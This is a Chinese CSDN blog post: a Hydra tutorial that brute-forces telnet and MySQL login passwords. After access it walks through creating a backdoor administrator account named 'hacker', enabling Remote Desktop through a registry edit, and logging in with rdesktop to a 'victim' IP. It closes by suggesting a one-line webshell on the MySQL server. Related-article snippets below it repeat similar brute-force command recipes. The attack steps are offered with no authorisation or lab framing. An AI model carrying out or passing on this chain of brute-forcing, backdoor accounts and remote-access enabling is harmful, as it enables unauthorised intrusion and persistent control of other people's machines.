hydra渗透篇破解密码从而获取权限

最新推荐文章于 2024-09-16 11:39:26 发布

把爱留在618

最新推荐文章于 2024-09-16 11:39:26 发布

阅读量912

点赞数

文章标签：网络安全

本文链接：https://blog.csdn.net/A485860941/article/details/123839530

版权

1 使用命令前我们先了解一下hydra基本命令

下面我们破解一下23号端口远程登录协议

使用hydra破解23号端口 telnet协议[远程登录协议]

hydra [IP地址] [协议] -l [用户名] -P[密码字典] –vV[详细信息]

hydra 0.0.0.0 telnet -l administrator -P Top1500.txt -vV

如果命令行看着不舒服的话,可以使用以下命令打开3389远程登录界面:

以下命令在telnet远程登录连接到靶机CMD命令行里面输入:

创建一个账户为hacker密码为:woaini0.0
net user hacker woaini0.0 /add


提升到管理员组
net localgroup administrators hacker /add
      本地组      管理员组      用户   添加


下一步使用命令开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


最后回到自己kali机器使用   rdesktop 172.16.15.24 -u hacker -p woaini0.0
                         远程桌面    受害者IP     指定用户    指定密码

在来破解一下3306mysql服务密码

hydra 0.0.0.0 mysql -l root -P Top1500.txt -vV
软件  目标地址 服务名 指定用户   指定密码文件  详细输出

有感兴趣的可以在mysql服务器里面插入一句话木马连接到受害者机器.

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

把爱留在618

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结

杨秀璋的专栏

03-05

2万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制，通过构造ROP链来绕过DEP保护，并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路，并结合作者系列文章总结Web渗透技术点，非常适合初学者学习，希望对您有所帮助~

用Hydra工具暴力破解Windows7管理员密码并访问它的共享服务

qq_44624916的博客

08-10

2916

用Hydra工具暴力破解Windows7管理员密码并访问它的共享服务 1、开启win7的管理员用户-administrator，并设置一个密码为123456 2、开启win7的共享服务等(默认似乎已经开启） 3、kali中namp工具扫描445等端口是否已经开放。可以看到是开放的。 4、打开kali，用john工具生成简单的密码 root@kali2:~# john --wordlist --rules --stdout > passwd.txt 5、用hydra工具暴力破解windows密

参与评论您还未登录，请先登录后发表或查看评论

mysql文件上传漏洞_利用文件上传漏洞渗透某传销服务器

weixin_36109375的博客

02-28

278

利用文件上传漏洞渗透某传销服务器Simeon本文已投i春秋https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=30085&page=1#pid389491对于传销网站的服务器来说，目前都防护较强，使用安全狗等软硬件防范，但由于最终使用该产品的必须由人来实现，当获取webshell的情况下，通过一些技术手段可以绕过防火墙的防护，...

网络安全学习（三）Hydra破解密码

热门推荐

wangyuxiang946的博客

12-06

3万+

Hydra也叫九头蛇，是一款开源的暴力PJ工具，集成在kali当中。

Hydra(九头蛇)密码破解工具的详细使用教程

黄乔国PHP

07-16

6339

Hydra是⼀款开源的暴⼒密码pojie⼯具，⽀持多种协议密码的破译。可以对多种服务的账号和密码进行爆破，包括数据库、SSH、FTP 等服务，在 Kali Linux 中自带 Hydra。有了这个工具就可以很方便的对密码进行破解。其简单的使用参数如下：完整参数可以使用-h来查看:支持爆破的服务也很多：如http,ftp,redis, mysql,mssql, mongod等等。

【kali】kali暴力破解工具-hydra

Kris__zhang的博客

05-13

1万+

简介 hydra是著名黑客组织thc的一款开源的暴力破解密码工具，功能非常强大，kali下是默认安装的，几乎支持所有协议的在线破解。密码能否破解，在于字典是否强大。本文仅从安全角度去讲解工具的使用，请勿用于非法用途。 hydra的使用使用方法：hydra <参数> <IP地址> <服务名> 帮助命令：hydra -h //查看基本用法 hydra参数 -R #继续从上一次进度接着破解。 -S #采用SSL链接。 -s #PORT 可通过这个参数指定非默认端口。

vulstack2（hydra爆mssql、免杀360、cs、msf渗透、weblogic、computer brower服务支持6118，域管密码过期kerberos认证错误导致部分域服务不可用）

qq_45290991的博客

09-24

1810

很久之前打了第一个靶场，但是打的不全，不舒坦，不够彻底，由于一直报rpc连接失败所以有的步骤不顺，这次学了一点小小的免杀技巧，过来带着练习的心态学学这个靶场。 0、环境搭建（难点）环境搭建参考：漏洞详情【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园红日靶场二 WalkThrough – Crispr –热爱技术和生活记得要在web机子里面手动开启服务，在 C:\Oracle\Middleware\user_projects\doma

【Linux_Kali网络渗透测试学习笔记总结（七）】提升权限

数据库爆破专家的博客

04-30

2999

网络渗透测试（六）：提升权限文章目录网络渗透测试（六）：提升权限1.利用本地漏洞2.密码攻击2.1 离线攻击工具2.1.1 hash-dentifier2.1.2 Hashcat2.1.3 RainbowCrack2.1.4 samdump22.1.5 John2.1.6 Johnny2.1.7 Ophcrack2.1.8 Crunch2.2 在线破解工具2.2.1 CeWL2.2.2 Hydr...

渗透流程--信息收集篇

m0_55563900的博客

03-27

2467

收集对象：http://www.dotahacker.com/ 一、whois信息收集 1、站长之家whois查询：http://whois.chinaz.com/ 2、爱站网whois查询：https://whois.aizhan.com/ 3、万网whois查询：https://wanwang.aliyun.com/?utm_content=se_1006856273 4、网址：https://www.iana.org/whois 5、站点法人信息查询（1）法人姓名查询和官方企查查查到

[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令

杨秀璋的专栏

02-21

2万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了微软证书漏洞（CVE-2020-0601），并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程，第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章，希望对您有所帮助。

路由器管理后台暴力破解器 v2.5

03-08

Developed by VB.NET 针对DLINK路由器管理后台登录口进行破解单线程无需花费时间等待字典档完全载入完整开发进度请至 http://blog.csdn.net/yehjordan/article/details/18862147

kali中Hydra用法及对ssh，数据库密码的爆破

weixin_46263525的博客

07-25

6783

kali中Hydra的用法及对ssh，数据库密码的爆破

Kali Linux - 嗅探和欺骗及密码破解工具

简介

02-05

2990

这期内容及其的少，所以…明天我休息(￣︶￣*))下期更维护访问和逆向工程。

linux 下kali linux 中使用hydra 进行对虚拟机中win10系统的密码破解

asmallfanofjay的博客

11-03

5724

要下载kali Linux版本的可以自己去官网进行下载，在这里就不提供网址了，可以自行百度直接到官网进行下载即可。准备工作： 1.需要一个kali系统（kali系统自带hydra，可以进行破解); 2.虚拟机中win10系统（登录密码不要太简单）并且对于win10系统来说，它的防火墙一定是要关闭的就像： 3.win10系统的远程桌面一定是要打开的：显示页面中刚开始我电脑上没有显示系统属性中远程桌面这个栏目，后面查找了是因为我的安装时，win10的系统是家庭版的，没有这个远程桌面的选项。如果要开启远程

【工具】hydra(爆破各种服务大集合)

Butterfly0011的博客

07-11

3815

简单万金油： Hydra –L 文件路径 –P 密码路径 t 线程 –vV 详细显示 –o 指定生成路径 –f 找到密码就停止 –e ns 空密码和指定密码试探 ip service 爆破服务爆破ssh： hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o /1 -vV ip ssh 爆破ftp： hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) –vV hydra ip ftp

hydra使用教程

weixin_45778886的博客

03-14

4169

目录标题注意hydra详细使用教程hydra简介hydra常用命令hydra支持破解的服务/协议对应功能的参数模板1、破解ssh：2、破解ftp：3、get方式提交，破解web登录：4、post方式提交，破解web登录：5、破解https：6、破解teamspeak：7、破解cisco：8、破解smb：9、破解pop3：10、破解rdp：11、破解http-proxy：12、破解imap：实例演示-破解SSH密码1.使用字典对目标服务进行破解。2.当目标服务开放的端口不是默认端口时，使用 -s 进行指定。3

kali-Linux局域网渗透之Win2003

LJHandCXY的博客

02-27

3890

端口渗透—23端口Telnet

negnegil的博客

09-15

5378

Telnet是一种默认不加密的不安全协议，可以通过它连接到本地网络中的其他系统。 Telnet远程登录 telnet 192.168.0.124 获取Telnet服务版本 nmap -sV -p23 <ip> MITM:远程登录欺骗通过metasploit的 auxiliary/server/capture/telnet模块在本机上设置一个虚假的telnet服务，通过钓鱼使其登录此telnet服务，一旦其尝试登录此虚假的telnet服务，我们就可以获取到他的登录凭证。这种和钓鱼有异曲同

Kali系列之Hydra/Medusa mysql密码爆破

05-13

Hydra和Medusa是常用的密码爆破工具，可以用于测试弱密码。这里以MySQL为例进行演示。首先，安装Hydra和Medusa。在Kali Linux中，可以使用以下命令安装： ``` sudo apt-get install hydra sudo apt-get install medusa ``` 然后，使用Hydra和Medusa进行MySQL密码爆破。以下是使用Hydra的命令示例： ``` hydra -L username.txt -P password.txt mysql://ip_address ``` 其中，`username.txt`和`password.txt`分别是用户名和密码的字典文件，`ip_address`是目标MySQL服务器的IP地址。执行该命令后，Hydra将尝试使用字典文件中的用户名和密码进行爆破。另外，以下是使用Medusa的命令示例： ``` medusa -h ip_address -U username.txt -P password.txt -M mysql ``` 其中，`ip_address`是目标MySQL服务器的IP地址，`username.txt`和`password.txt`分别是用户名和密码的字典文件，`-M mysql`指定使用MySQL协议进行爆破。执行该命令后，Medusa将尝试使用字典文件中的用户名和密码进行爆破。需要注意的是，在进行密码爆破测试时，需要获得授权并遵守法律法规，不得用于非法用途。